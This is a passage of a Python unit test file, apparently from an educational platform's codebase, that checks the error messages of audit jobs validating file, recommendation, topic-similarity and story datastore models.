u'[u\'failed validation check for current time check of '
'FileMetadataSnapshotContentModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_file_metadata_model_failure(self):
file_models.FileMetadataModel.get_by_id(
self.id_0).delete(self.owner_id, '', [])
expected_output = [
(
u'[u\'failed validation check for file_metadata_ids '
'field check of FileMetadataSnapshotContentModel\', '
'[u"Entity id %s-1: based on field file_metadata_ids '
'having value %s, expect model FileMetadataModel with '
'id %s but it doesn\'t exist", u"Entity id %s-2: based on '
'field file_metadata_ids having value %s, expect model '
'FileMetadataModel with id %s but it doesn\'t exist"]]'
) % (
self.id_0, self.id_0, self.id_0, self.id_0, self.id_0,
self.id_0),
u'[u\'fully-validated FileMetadataSnapshotContentModel\', 1]']
run_job_and_check_output(self, expected_output, literal_eval=True)
def test_invalid_file_metadata_version_in_model_id(self):
model_with_invalid_version_in_id = (
file_models.FileMetadataSnapshotContentModel(
id='%s-3' % self.id_0))
model_with_invalid_version_in_id.content = {}
model_with_invalid_version_in_id.put()
expected_output = [
(
u'[u\'failed validation check for file metadata model '
'version check of FileMetadataSnapshotContentModel\', '
'[u\'Entity id %s-3: FileMetadata model corresponding to '
'id %s has a version 1 which is less than '
'the version 3 in snapshot content model id\']]'
) % (self.id_0, self.id_0), (
u'[u\'fully-validated FileMetadataSnapshotContentModel\', '
'2]')]
run_job_and_check_output(self, expected_output, sort=True)
class FileModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
super(FileModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
explorations = [exp_domain.Exploration.create_default_exploration(
'exp%s' % i,
title='title %d' % i,
category='category%d' % i,
) for i in xrange(2)]
for exp in explorations:
exp_services.save_new_exploration(self.owner_id, exp)
self.model_instance_0 = file_models.FileModel.create(
'exploration/exp0', 'assets/image/img0.png')
self.model_instance_0.commit(self.owner_id, [])
self.model_instance_1 = file_models.FileModel.create(
'exploration/exp1', '/exploration/exp1/assets/audio/aud1.mp3')
self.model_instance_1.commit(self.owner_id, [])
self.job_class = (
prod_validation_jobs_one_off.FileModelAuditOneOffJob)
def test_standard_operation(self):
expected_output = [
u'[u\'fully-validated FileModel\', 2]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.commit(feconf.SYSTEM_COMMITTER_ID, [])
expected_output = [
(
u'[u\'failed validation check for time field relation check '
'of FileModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
),
u'[u\'fully-validated FileModel\', 1]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
expected_output = [(
u'[u\'failed validation check for current time check of '
'FileModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_exploration_model_failure(self):
exp_models.ExplorationModel.get_by_id('exp1').delete(
feconf.SYSTEM_COMMITTER_ID, '', [])
expected_output = [
(
u'[u\'failed validation check for exploration_ids field '
'check of FileModel\', '
'[u"Entity id %s: based on field exploration_ids having '
'value exp1, expect model ExplorationModel with id exp1 '
'but it doesn\'t exist"]]') % self.model_instance_1.id,
u'[u\'fully-validated FileModel\', 1]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_snapshot_metadata_model_failure(self):
file_models.FileSnapshotMetadataModel.get_by_id(
'%s-1' % self.model_instance_0.id).delete()
expected_output = [
(
u'[u\'failed validation check for snapshot_metadata_ids '
'field check of FileModel\', '
'[u"Entity id %s: based on field snapshot_metadata_ids '
'having value %s-1, expect model FileSnapshotMetadataModel '
'with id %s-1 but it doesn\'t exist"]]') % (
self.model_instance_0.id, self.model_instance_0.id,
self.model_instance_0.id),
u'[u\'fully-validated FileModel\', 1]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_snapshot_content_model_failure(self):
file_models.FileSnapshotContentModel.get_by_id(
'%s-1' % self.model_instance_0.id).delete()
expected_output = [
(
u'[u\'failed validation check for snapshot_content_ids '
'field check of FileModel\', '
'[u"Entity id %s: based on field snapshot_content_ids having '
'value %s-1, expect model FileSnapshotContentModel '
'with id %s-1 but it doesn\'t exist"]]') % (
self.model_instance_0.id, self.model_instance_0.id,
self.model_instance_0.id),
u'[u\'fully-validated FileModel\', 1]']
run_job_and_check_output(self, expected_output, sort=True)
class FileSnapshotMetadataModelValidatorTests(
test_utils.GenericTestBase):
def setUp(self):
super(FileSnapshotMetadataModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup(USER_EMAIL, USER_NAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.user_id = self.get_user_id_from_email(USER_EMAIL)
explorations = [exp_domain.Exploration.create_default_exploration(
'exp%s' % i,
title='title %d' % i,
category='category%d' % i,
) for i in xrange(2)]
for exp in explorations:
exp_services.save_new_exploration(self.owner_id, exp)
file_model_0 = file_models.FileModel.create(
'exploration/exp0', 'assets/image/img0.png')
file_model_0.commit(self.owner_id, [])
file_model_1 = file_models.FileModel.create(
'exploration/exp1', '/exploration/exp1/assets/audio/aud1.mp3')
file_model_1.commit(self.user_id, [])
self.id_0 = file_model_0.id
self.id_1 = file_model_1.id
self.model_instance_0 = (
file_models.FileSnapshotMetadataModel.get_by_id(
'%s-1' % self.id_0))
self.model_instance_1 = (
file_models.FileSnapshotMetadataModel.get_by_id(
'%s-1' % self.id_1))
self.job_class = (
prod_validation_jobs_one_off
.FileSnapshotMetadataModelAuditOneOffJob)
def test_standard_operation(self):
expected_output = [
u'[u\'fully-validated FileSnapshotMetadataModel\', 2]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of FileSnapshotMetadataModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), (
u'[u\'fully-validated '
'FileSnapshotMetadataModel\', 1]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete()
expected_output = [(
u'[u\'failed validation check for current time check of '
'FileSnapshotMetadataModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_file_model_failure(self):
file_models.FileModel.get_by_id(self.id_0).delete(
self.owner_id, '', [])
expected_output = [
(
u'[u\'failed validation check for file_ids '
'field check of FileSnapshotMetadataModel\', '
'[u"Entity id %s-1: based on field file_ids '
'having value %s, expect model FileModel with '
'id %s but it doesn\'t exist", u"Entity id %s-2: based on '
'field file_ids having value %s, expect model '
'FileModel with id %s but it doesn\'t exist"]]'
) % (
self.id_0, self.id_0, self.id_0, self.id_0,
self.id_0, self.id_0),
u'[u\'fully-validated FileSnapshotMetadataModel\', 1]']
run_job_and_check_output(
self, expected_output, literal_eval=True)
def test_missing_committer_model_failure(self):
user_models.UserSettingsModel.get_by_id(self.user_id).delete()
expected_output = [
(
u'[u\'failed validation check for committer_ids field '
'check of FileSnapshotMetadataModel\', '
'[u"Entity id %s-1: based on field committer_ids having '
'value %s, expect model UserSettingsModel with id %s '
'but it doesn\'t exist"]]'
) % (self.id_1, self.user_id, self.user_id), (
u'[u\'fully-validated '
'FileSnapshotMetadataModel\', 1]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_invalid_file_version_in_model_id(self):
model_with_invalid_version_in_id = (
file_models.FileSnapshotMetadataModel(
id='%s-3' % self.id_0, committer_id=self.owner_id,
commit_type='edit', commit_message='msg', commit_cmds=[{}]))
model_with_invalid_version_in_id.put()
expected_output = [
(
u'[u\'failed validation check for file model '
'version check of FileSnapshotMetadataModel\', '
'[u\'Entity id %s-3: File model corresponding to '
'id %s has a version 1 which is less than the version 3 in '
'snapshot metadata model id\']]'
) % (self.id_0, self.id_0), (
u'[u\'fully-validated FileSnapshotMetadataModel\', '
'2]')]
run_job_and_check_output(self, expected_output, sort=True)
class FileSnapshotContentModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
super(FileSnapshotContentModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
explorations = [exp_domain.Exploration.create_default_exploration(
'exp%s' % i,
title='title %d' % i,
category='category%d' % i,
) for i in xrange(2)]
for exp in explorations:
exp_services.save_new_exploration(self.owner_id, exp)
file_model_0 = file_models.FileModel.create(
'exploration/exp0', 'assets/image/img0.png')
file_model_0.commit(self.owner_id, [])
file_model_1 = file_models.FileModel.create(
'exploration/exp1', '/exploration/exp1/assets/audio/aud1.mp3')
file_model_1.commit(self.owner_id, [])
self.id_0 = file_model_0.id
self.id_1 = file_model_1.id
self.model_instance_0 = (
file_models.FileSnapshotContentModel.get_by_id(
'%s-1' % self.id_0))
self.model_instance_1 = (
file_models.FileSnapshotContentModel.get_by_id(
'%s-1' % self.id_1))
self.job_class = (
prod_validation_jobs_one_off.FileSnapshotContentModelAuditOneOffJob)
def test_standard_operation(self):
expected_output = [
u'[u\'fully-validated FileSnapshotContentModel\', 2]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of FileSnapshotContentModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), (
u'[u\'fully-validated '
'FileSnapshotContentModel\', 1]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete()
expected_output = [(
u'[u\'failed validation check for current time check of '
'FileSnapshotContentModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_file_model_failure(self):
file_models.FileModel.get_by_id(
self.id_0).delete(self.owner_id, '', [])
expected_output = [
(
u'[u\'failed validation check for file_ids '
'field check of FileSnapshotContentModel\', '
'[u"Entity id %s-1: based on field file_ids '
'having value %s, expect model FileModel with '
'id %s but it doesn\'t exist", u"Entity id %s-2: based on '
'field file_ids having value %s, expect model '
'FileModel with id %s but it doesn\'t exist"]]'
) % (
self.id_0, self.id_0, self.id_0, self.id_0, self.id_0,
self.id_0),
u'[u\'fully-validated FileSnapshotContentModel\', 1]']
run_job_and_check_output(self, expected_output, literal_eval=True)
def test_invalid_file_version_in_model_id(self):
model_with_invalid_version_in_id = (
file_models.FileSnapshotContentModel(
id='%s-3' % self.id_0))
model_with_invalid_version_in_id.content = 'content'
model_with_invalid_version_in_id.put()
expected_output = [
(
u'[u\'failed validation check for file model '
'version check of FileSnapshotContentModel\', '
'[u\'Entity id %s-3: File model corresponding to '
'id %s has a version 1 which is less than '
'the version 3 in snapshot content model id\']]'
) % (self.id_0, self.id_0), (
u'[u\'fully-validated FileSnapshotContentModel\', '
'2]')]
run_job_and_check_output(self, expected_output, sort=True)
class ExplorationRecommendationsModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
super(ExplorationRecommendationsModelValidatorTests, self).setUp()
self.signup(USER_EMAIL, USER_NAME)
self.user_id = self.get_user_id_from_email(USER_EMAIL)
explorations = [exp_domain.Exploration.create_default_exploration(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
) for i in xrange(6)]
for exp in explorations:
exp_services.save_new_exploration(self.user_id, exp)
recommendations_services.set_recommendations('0', ['3', '4'])
recommendations_services.set_recommendations('1', ['5'])
self.model_instance_0 = (
recommendations_models.ExplorationRecommendationsModel.get_by_id(
'0'))
self.model_instance_1 = (
recommendations_models.ExplorationRecommendationsModel.get_by_id(
'1'))
self.job_class = (
prod_validation_jobs_one_off
.ExplorationRecommendationsModelAuditOneOffJob)
def test_standard_model(self):
expected_output = [(
u'[u\'fully-validated ExplorationRecommendationsModel\', 2]')]
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for time field relation check '
'of ExplorationRecommendationsModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id, self.model_instance_0.created_on,
self.model_instance_0.last_updated),
u'[u\'fully-validated ExplorationRecommendationsModel\', 1]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete()
expected_output = [(
u'[u\'failed validation check for current time check of '
'ExplorationRecommendationsModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output)
def test_model_with_missing_recommended_exploration(self):
exp_models.ExplorationModel.get_by_id('3').delete(
self.user_id, '', [{}])
expected_output = [
(
u'[u\'failed validation check for exploration_ids field '
'check of ExplorationRecommendationsModel\', '
'[u"Entity id 0: based on field exploration_ids having value '
'3, expect model ExplorationModel with '
'id 3 but it doesn\'t exist"]]'
),
u'[u\'fully-validated ExplorationRecommendationsModel\', 1]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_id_in_recommended_ids(self):
self.model_instance_0.recommended_exploration_ids = ['0', '4']
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for item exploration id check '
'of ExplorationRecommendationsModel\', '
'[u\'Entity id 0: The exploration id: 0 for which the '
'entity is created is also present in the recommended '
'exploration ids for entity\']]'
),
u'[u\'fully-validated ExplorationRecommendationsModel\', 1]']
run_job_and_check_output(self, expected_output, sort=True)
class TopicSimilaritiesModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
super(TopicSimilaritiesModelValidatorTests, self).setUp()
self.model_instance = recommendations_models.TopicSimilaritiesModel(
id=recommendations_models.TOPIC_SIMILARITIES_ID)
self.content = {
'Art': {'Art': '1.0', 'Biology': '0.8', 'Chemistry': '0.1'},
'Biology': {'Art': '0.8', 'Biology': '1.0', 'Chemistry': '0.5'},
'Chemistry': {'Art': '0.1', 'Biology': '0.5', 'Chemistry': '1.0'},
}
self.model_instance.content = self.content
self.model_instance.put()
self.job_class = (
prod_validation_jobs_one_off.TopicSimilaritiesModelAuditOneOffJob)
def test_standard_model(self):
expected_output = [(
u'[u\'fully-validated TopicSimilaritiesModel\', 1]')]
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance.created_on = (
self.model_instance.last_updated + datetime.timedelta(days=1))
self.model_instance.put()
expected_output = [
(
u'[u\'failed validation check for time field relation check '
'of TopicSimilaritiesModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance.id, self.model_instance.created_on,
self.model_instance.last_updated)]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
expected_output = [(
u'[u\'failed validation check for current time check of '
'TopicSimilaritiesModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance.id, self.model_instance.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output)
def test_model_with_invalid_id(self):
model_with_invalid_id = recommendations_models.TopicSimilaritiesModel(
id='invalid', content=self.content)
model_with_invalid_id.put()
expected_output = [
(
u'[u\'failed validation check for model id check of '
'TopicSimilaritiesModel\', '
'[u\'Entity id invalid: Entity id does not match regex '
'pattern\']]'
),
u'[u\'fully-validated TopicSimilaritiesModel\', 1]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_topic_similarities_columns(self):
content = {
'Art': {'Art': '1.0', 'Biology': '0.5'},
'Biology': {}
}
self.model_instance.content = content
self.model_instance.put()
expected_output = [(
u'[u\'failed validation check for topic similarity check '
'of TopicSimilaritiesModel\', '
'[u"Entity id topics: Topic similarity validation for '
'content: {u\'Biology\': {}, u\'Art\': {u\'Biology\': u\'0.5\', '
'u\'Art\': u\'1.0\'}} fails with error: Length of topic '
'similarities columns: 1 does not match length of '
'topic list: 2."]]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_topic(self):
content = {
'Art': {'Art': '1.0', 'invalid': '0.5'},
'invalid': {'Art': '0.5', 'invalid': '1.0'}
}
self.model_instance.content = content
self.model_instance.put()
expected_output = [(
u'[u\'failed validation check for topic similarity check '
'of TopicSimilaritiesModel\', '
'[u"Entity id topics: Topic similarity validation for '
'content: {u\'Art\': {u\'Art\': u\'1.0\', u\'invalid\': u\'0.5\'}, '
'u\'invalid\': {u\'Art\': u\'0.5\', u\'invalid\': u\'1.0\'}} '
'fails with error: Topic invalid not in list of known topics."]]')]
run_job_and_check_output(self, expected_output)
def test_model_with_invalid_topic_similarities_rows(self):
content = {
'Art': {'Art': '1.0', 'Biology': '0.5'}
}
self.model_instance.content = content
self.model_instance.put()
expected_output = [(
u'[u\'failed validation check for topic similarity check '
'of TopicSimilaritiesModel\', [u"Entity id topics: '
'Topic similarity validation for content: {u\'Art\': '
'{u\'Biology\': u\'0.5\', u\'Art\': u\'1.0\'}} fails with '
'error: Length of topic similarities rows: 2 does not match '
'length of topic list: 1."]]')]
run_job_and_check_output(self, expected_output)
def test_model_with_invalid_similarity_type(self):
content = {
'Art': {'Art': 'one', 'Biology': 0.5},
'Biology': {'Art': 0.5, 'Biology': 1.0}
}
self.model_instance.content = content
self.model_instance.put()
expected_output = [(
u'[u\'failed validation check for topic similarity '
'check of TopicSimilaritiesModel\', '
'[u"Entity id topics: Topic similarity validation for '
'content: {u\'Biology\': {u\'Biology\': 1.0, u\'Art\': 0.5}, '
'u\'Art\': {u\'Biology\': 0.5, u\'Art\': u\'one\'}} '
'fails with error: Expected similarity to be a float, '
'received one"]]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_similarity_value(self):
content = {
'Art': {'Art': 10.0, 'Biology': 0.5},
'Biology': {'Art': 0.5, 'Biology': 1.0}
}
self.model_instance.content = content
self.model_instance.put()
expected_output = [(
u'[u\'failed validation check for topic similarity check '
'of TopicSimilaritiesModel\', '
'[u"Entity id topics: Topic similarity validation for '
'content: {u\'Biology\': {u\'Biology\': 1.0, u\'Art\': 0.5}, '
'u\'Art\': {u\'Biology\': 0.5, u\'Art\': 10.0}} '
'fails with error: Expected similarity to be between '
'0.0 and 1.0, received 10.0"]]')]
run_job_and_check_output(self, expected_output)
def test_model_with_assymetric_content(self):
content = {
'Art': {'Art': 1.0, 'Biology': 0.5},
'Biology': {'Art': 0.6, 'Biology': 1.0}
}
self.model_instance.content = content
self.model_instance.put()
expected_output = [(
u'[u\'failed validation check for topic similarity '
'check of TopicSimilaritiesModel\', '
'[u"Entity id topics: Topic similarity validation for '
'content: {u\'Biology\': {u\'Biology\': 1.0, u\'Art\': 0.6}, '
'u\'Art\': {u\'Biology\': 0.5, u\'Art\': 1.0}} fails with error: '
'Expected topic similarities to be symmetric."]]')]
run_job_and_check_output(self, expected_output)
class StoryModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
super(StoryModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
explorations = [exp_domain.Exploration.create_default_exploration(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
) for i in xrange(6)]
for exp in explorations:
exp_services.save_new_exploration(self.owner_id, exp)
topic = topic_domain.Topic.create_default_topic(
topic_id='0', name='topic')
language_codes = ['ar', 'en', 'en']
stories = [story_domain.Story.create_default_story(
'%s' % i,
title='title %d',
corresponding_topic_id='0'
) for i in xrange(3)]
for index, story in enumerate(stories):
story.language_code = language_codes[index]
story.add_node('node_1', 'Node1')
story.add_node('node_2', 'Node2')
story.update_node_destination_node_ids('node_1', ['node_2'])
story.update_node_exploration_id(
'node_1', explorations[index * 2].id)
story.update_node_exploration_id(
'node_2', explorations[index * 2 + 1].id)
topic.add_canonical_story(story.id)
story_services.save_new_story(self.owner_id, story)
topic_services.save_new_topic(self.owner_id, topic)
self.model_instance_0 = story_models.StoryModel.get_by_id('0')
self.model_instance_1 = story_models.StoryModel.get_by_id('1')
self.model_instance_2 = story_models.StoryModel.get_by_id('2')
self.job_class = (
prod_validation_jobs_one_off.StoryModelAuditOneOffJob)
def test_standard_operation(self):
story_services.update_story(
self.owner_id, '0', [story_domain.StoryChange({
'cmd': 'update_story_property',
'property_name': 'title',
'new_value': 'New title',
'old_value': 'title 0'
})], 'Changes.')
expected_output = [
u'[u\'fully-validated StoryModel\', 3]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.commit(
feconf.SYSTEM_COMMITTER_ID, 'created_on test', [])
expected_output = [
(
u'[u\'failed validation check for time field relation check '
'of StoryModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
),
u'[u\'fully-validated StoryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
self.model_instance_2.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
expected_output = [(
u'[u\'failed validation check for current time check of '
'StoryModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_story_schema(self):
expected_output = [
(
u'[u\'failed validation check for domain object check of '
'StoryModel\', '
'[u\'Entity id %s: Entity fails domain validation with the '
'error Invalid language code: %s\']]'
) % (self.model_instance_0.id, self.model_instance_0.language_code),
u'[u\'fully-validated StoryModel\', 2]']
with self.swap(
constants, 'ALL_LANGUAGE_CODES', [{
'code': 'en', 'description': 'English'}]):
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_exploration_model_failure(self):
exp_models.ExplorationModel.get_by_id('1').delete(
feconf.SYSTEM_COMMITTER_ID, '', [])
expected_output = [
(
u'[u\'failed validation check for exploration_ids field '
'check of StoryModel\', '
'[u"Entity id 0: based on field exploration_ids having value '
'1, expect model ExplorationModel with id 1 but it '
'doesn\'t exist"]]'),
u'[u\'fully-validated StoryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_story_commit_log_entry_model_failure(self):
story_services.update_story(
self.owner_id, '0', [story_domain.StoryChange({
'cmd': 'update_story_property',
'property_name': 'title',
'new_value': 'New title',
'old_value': 'title 0'
})], 'Changes.')
story_models.StoryCommitLogEntryModel.get_by_id(
'story-0-1').delete()
expected_output = [
(
u'[u\'failed validation check for '
'story_commit_log_entry_ids field check of '
'StoryModel\', '
'[u"Entity id 0: based on field '
'story_commit_log_entry_ids having value '
'story-0-1, expect model StoryCommitLogEntryModel '
'with id story-0-1 but it doesn\'t exist"]]'),
u'[u\'fully-validated StoryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_summary_model_failure(self):
story_models.StorySummaryModel.get_by_id('0').delete()
expected_output = [
(
u'[u\'failed validation check for story_summary_ids '
'field check of StoryModel\', '
'[u"Entity id 0: based on field story_summary_ids having '
'value 0, expect model StorySummaryModel with id 0 '
'but it doesn\'t exist"]]'),
u'[u\'fully-validated StoryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_story_rights_model_failure(self):
story_models.StoryRightsModel.get_by_id(
'0').delete(feconf.SYSTEM_COMMITTER_ID, '', [])
expected_output = [
(
u'[u\'failed validation check for story_rights_ids '
'field check of StoryModel\', '
'[u"Entity id 0: based on field story_rights_ids having '
'value 0, expect model StoryRightsModel with id 0 but '
'it doesn\'t exist"]]'),
u'[u\'fully-validated StoryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_snapshot_metadata_model_failure(self):
story_models.StorySnapshotMetadataModel.get_by_id(
'0-1').delete()
expected_output = [
(
u'[u\'failed validation check for snapshot_metadata_ids '
'field check of StoryModel\', '
'[u"Entity id 0: based on field snapshot_metadata_ids having '
'value 0-1, expect model StorySnapshotMetadataModel '
'with id 0-1 but it doesn\'t exist"]]'),
u'[u\'fully-validated StoryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_snapshot_content_model_failure(self):
story_models.StorySnapshotContentModel.get_by_id(
'0-1').delete()
expected_output = [
(
u'[u\'failed validation check for snapshot_content_ids '
'field check of StoryModel\', '
'[u"Entity id 0: based on field snapshot_content_ids having '
'value 0-1, expect model StorySnapshotContentModel '
'with id 0-1 but it doesn\'t exist"]]'),
u'[u\'fully-validated StoryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
class StorySnapshotMetadataModelValidatorTests(
test_utils.GenericTestBase):
def setUp(self):
super(StorySnapshotMetadataModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup(USER_EMAIL, USER_NAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.user_id = self.get_user_id_from_email(USER_EMAIL)
topic = topic_domain.Topic.create_default_topic(
topic_id='0', name='topic')
stories = [story_domain.Story.create_default_story(
'%s' % i,
title='title %d' % i,
corresponding_topic_id='0'
) for i in xrange(3)]
for story in stories:
if story.id != '0':
story_services.save_new_story(self.owner_id, story)
else:
story_services.save_new_story(self.user_id, story)
topic.add_canonical_story(story.id)
topic_services.save_new_topic(self.owner_id, topic)
self.model_instance_0 = (
story_models.StorySnapshotMetadataModel.get_by_id(
'0-1'))
self.model_instance_1 = (
story_models.StorySnapshotMetadataModel.get_by_id(
'1-1'))
self.model_instance_2 = (
story_models.StorySnapshotMetadataModel.get_by_id(
'2-1'))
self.job_class = (
prod_validation_jobs_one_off
.StorySnapshotMetadataModelAuditOneOffJob)
def test_standard_operation(self):
story_services.update_story(
self.owner_id, '0', [story_domain.StoryChange({
'cmd': 'update_story_property',
'property_name': 'title',
'new_value': 'New title',
'old_value': 'title 0'
})], 'Changes.')
expected_output = [
u'[u\'fully-validated StorySnapshotMetadataModel\', 4]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of StorySnapshotMetadataModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), (
u'[u\'fully-validated '
'StorySnapshotMetadataModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete()
self.model_instance_2.delete()
expected_output = [(
u'[u\'failed validation check for current time check of '
'StorySnapshotMetadataModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_story_model_failure(self):
story_models.StoryModel.get_by_id('0').delete(
self.user_id, '', [])
expected_output = [
(
